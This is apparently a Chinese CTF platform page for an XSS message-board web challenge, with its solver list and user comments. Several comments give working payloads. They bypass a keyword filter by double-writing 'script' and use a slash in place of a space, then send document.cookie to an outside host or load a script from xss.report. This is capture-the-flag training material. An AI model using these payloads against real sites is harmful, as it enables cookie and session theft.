留言板1WEB 未解决
分数:
20
金币:
3
题目作者:
harry
一 血:
18256197318
一血奖励:
5金币
解 决:
215
提 示:
需要xss平台接收flag
描 述:
flag{}
评分(3)
解题动态
ailiyishen 攻破了该题 9天前
Galaxies2580 攻破了该题 10天前
Owen_10 攻破了该题 14天前
edadsadw 攻破了该题 1月前
小白RM 攻破了该题 1月前
wdfctf 攻破了该题 1月前
2523822945 攻破了该题 1月前
Anna-july 攻破了该题 1月前
wujita01 攻破了该题 1月前
XavierSilas 攻破了该题 1月前
kr2yh 攻破了该题 1月前
seyana 攻破了该题 1月前
scofield 攻破了该题 1月前
lee8ly 攻破了该题 2月前
沧颜 攻破了该题 2月前
hyj11125 攻破了该题 2月前
小马哥 攻破了该题 2月前
xiaomenghua 攻破了该题 2月前
jaysongong 攻破了该题 2月前
评论
小白RM 1月前
举报
三战,最后直接在当前页面执行了 location.href 跳转,并且用双写绕过关键词过滤 使用自建平台<scscriptript>location.href="http://www.iytzx.com/****/?cookie="+document.cookie</scscriptript>成功接收到flag
kr2yh 1月前
举报
<scriscriptpt/src=https://xss.report/c/kr2yh></scriscriptpt> 双写加/代替空格 就可以
十里故清云 3月前
举报
在线蹲大手子,只能靠自建vps公网ip收吗?? 现在还有xss平台能收吗(我已急哭)
qq1002517 3月前
举报
flag{**********}
网恋秀牛子被录屏导致自卑 5月前
举报
我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag。 这题是script双写绕过,空格用斜杠代替
十里故清云 3月前
举报
用双写绕过和空格了,还是收不到啊...
dlgz 9月前
举报
公网上的xss平台没找到http的,自己搭了一个测试的成功了。
Kr1smi1e 10月前
举报
题目确实没问题,可以参考:https://blog.csdn.net/weixin_74357882/article/details/149303799?sharetype=blogdetail&sharerId=149303799&sharerefer=PC&sharesource=weixin_74357882&spm=1011.2480.3001.8118
iNMB 10月前
举报
垃圾题目,输入的js根本没有回显。使用浏览器看cookies发现flag,结果上传flag说我flag错误。
llc123 1年前
举报
根本收不到,还以为你加了什么限制,花5金币看你wp等于白看
kl01 1年前
举报
试了几个xss平台收不到 自己没服务器溜了溜了